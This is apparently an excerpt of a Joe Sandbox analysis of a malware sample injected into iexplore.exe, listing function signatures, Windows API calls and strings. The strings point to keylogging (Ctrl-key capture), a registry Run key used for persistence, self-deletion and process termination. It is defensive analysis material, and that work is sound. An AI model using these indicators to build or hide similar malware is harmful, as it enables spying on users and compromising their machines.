              • Opcode ID: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
              • Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
              • Opcode Fuzzy Hash: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
              • Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Free
              • String ID: @"a/$FlsFree
              • API String ID: 3978063606-3293984177
              • Opcode ID: e2a40f0e077c40334e6a4387cc059f5655c9b270e51597316dcc5f9826c48e33
              • Instruction ID: 77bf7fedabadb9ea6800f7e87cab37a01a67ad405208859f8a523204304e0987
              • Opcode Fuzzy Hash: e2a40f0e077c40334e6a4387cc059f5655c9b270e51597316dcc5f9826c48e33
              • Instruction Fuzzy Hash: CDE0E575A40218E7D700AF659C06E7EBB54CF44B12B2102AEFD0557342DE386D188ADE
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Alloc
              • String ID: @"a/$FlsAlloc
              • API String ID: 2773662609-1304634873
              • Opcode ID: 1724b3fe8b5ba35a675ca6bcbc513a2a95b1368b35f56296ef93779567c9428b
              • Instruction ID: c1fb2f6f3e96c04a711f36652bc0978b46922b6b0bac1ff16f6cb7e5114ce70e
              • Opcode Fuzzy Hash: 1724b3fe8b5ba35a675ca6bcbc513a2a95b1368b35f56296ef93779567c9428b
              • Instruction Fuzzy Hash: 98E02B30640218E7D700AF65DC16A6EBB94CF48B12B20057FFD0557391DE786D0595DE
              APIs
              • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AAB7), ref: 00448996
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Time$FileSystem
              • String ID: @"a/$GetSystemTimePreciseAsFileTime
              • API String ID: 2086374402-4105869596
              • Opcode ID: 14ade04f60bc73be69f0a8e2d41fd66075f217d790f0afe8d3aaf6a6c36f91f3
              • Instruction ID: 0ece642104574987c61f359f6ab52f67772cb5eafdc88f944851b8b866d171c2
              • Opcode Fuzzy Hash: 14ade04f60bc73be69f0a8e2d41fd66075f217d790f0afe8d3aaf6a6c36f91f3
              • Instruction Fuzzy Hash: 55E0E571A41718E7D710AB259C02E7EBB54DB44B02B10027EFC0957382DE285D0496DE
              APIs
              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: ExecuteShell
              • String ID: !D@$open
              • API String ID: 587946157-1586967515
              • Opcode ID: ef1b3a0f4602e6d199ecf0e45d17a7acf077c1a045a33f1301243906c424f492
              • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
              • Opcode Fuzzy Hash: ef1b3a0f4602e6d199ecf0e45d17a7acf077c1a045a33f1301243906c424f492
              • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
              APIs
              • GetKeyState.USER32(00000012), ref: 0040B6A5
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: State
              • String ID: [CtrlL]$[CtrlR]
              • API String ID: 1649606143-2446555240
              • Opcode ID: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
              • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
              • Opcode Fuzzy Hash: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
              • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
              APIs
                • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
              • __Init_thread_footer.LIBCMT ref: 00410F29
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Init_thread_footer__onexit
              • String ID: ,kG$0kG
              • API String ID: 1881088180-2015055088
              • Opcode ID: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
              • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
              • Opcode Fuzzy Hash: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
              • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
              APIs
              • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D144,00000000,004752D8,004752F0,?,pth_unenc), ref: 00413A31
              • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00413A45
              Strings
              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: DeleteOpenValue
              • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
              • API String ID: 2654517830-1051519024
              • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
              • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
              • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
              • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
              APIs
              • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B876
              • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8A1
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: DeleteDirectoryFileRemove
              • String ID: pth_unenc
              • API String ID: 3325800564-4028850238
              • Opcode ID: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
              • Instruction ID: 8281cfb8de641f04b50c20d0c8e921e0d4b8d2282f61a3be21f0805504db5409
              • Opcode Fuzzy Hash: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
              • Instruction Fuzzy Hash: 45E046321007119BCB14AB258C48AD6339CAF0031AF00486FA492A32A1DF38AC09CAA8
              APIs
              • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
              • WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: ObjectProcessSingleTerminateWait
              • String ID: pth_unenc
              • API String ID: 1872346434-4028850238
              • Opcode ID: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
              • Instruction ID: 1c2a9d3d993a2aa40768a62e13ec0bdc830226799852dc8a6b6faba0c59f1205
              • Opcode Fuzzy Hash: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
              • Instruction Fuzzy Hash: 2FD01234189312FFD7350F60EE4DB043B98A705362F140265F428512F1C7A58994EA59
              APIs
              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
              • GetLastError.KERNEL32 ref: 00440D35
              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: ByteCharMultiWide$ErrorLast
              • String ID:
              • API String ID: 1717984340-0
              • Opcode ID: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
              • Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
              • Opcode Fuzzy Hash: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
              • Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759
              APIs
              • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
              • IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
              • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C7A
              • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: ErrorLastRead
              • String ID:
              • API String ID: 4100373531-0
              • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
              • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
              • Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
              • Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99